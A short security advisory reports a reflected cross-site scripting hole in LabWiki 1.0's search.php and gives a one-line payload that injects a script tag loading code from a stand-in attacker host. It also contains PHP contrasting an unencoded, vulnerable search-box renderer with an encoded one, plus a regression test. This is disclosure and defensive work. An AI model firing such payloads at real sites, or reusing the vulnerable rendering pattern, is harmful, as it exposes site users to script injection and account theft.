LabWiki 1.0
Homepage: http://www.bioinformatics.org/phplabware/labwiki/index.php

Affected files: search.php

The search input box does not sanitize user input before writing it into the dynamically generated page.

XSS proof of concept:

"><SCRIPT SRC=http://evilsite.com/xss.js></SCRIPT><"
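
The proof of concept starts with `">`, which closes a double-quoted attribute and its tag, so the sketch below assumes the search term is reflected into the value attribute of an input element. It is an added example, not LabWiki's code: the function names and the `query` field name are hypothetical, and it shows the unencoded pattern beside output encoding with a parser-based regression check.

```php
<?php
// Added illustration, not LabWiki source. Function names and the "query"
// field name are hypothetical. Requires PHP's bundled DOM extension.

// Vulnerable pattern: the term is concatenated into a double-quoted
// attribute as-is, so a `">` in the input ends the attribute and the tag.
function render_search_box_unsafe(string $query): string
{
    return '<input type="text" name="query" value="' . $query . '">';
}

// Hardened: encode for the HTML attribute context at output time.
function render_search_box_safe(string $query): string
{
    $encoded = htmlspecialchars($query, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="query" value="' . $encoded . '">';
}

// Regression check: parse the rendered markup and confirm that the input
// still carries the whole term as data and that no <script> element exists.
function reflects_as_data(string $html, string $query): bool
{
    $previous = libxml_use_internal_errors(true); // malformed markup is expected
    $doc = new DOMDocument();
    $doc->loadHTML($html);
    libxml_clear_errors();
    libxml_use_internal_errors($previous);

    $input = $doc->getElementsByTagName('input')->item(0);
    return $input !== null
        && $input->getAttribute('value') === $query
        && $doc->getElementsByTagName('script')->length === 0;
}

// The proof-of-concept string from the advisory, used as test input.
$poc = '"><SCRIPT SRC=http://evilsite.com/xss.js></SCRIPT><"';

foreach (['unsafe' => 'render_search_box_unsafe', 'safe' => 'render_search_box_safe'] as $label => $render) {
    $html = $render($poc);
    printf("%-6s reflects as data: %s\n", $label, var_export(reflects_as_data($html, $poc), true));
}
```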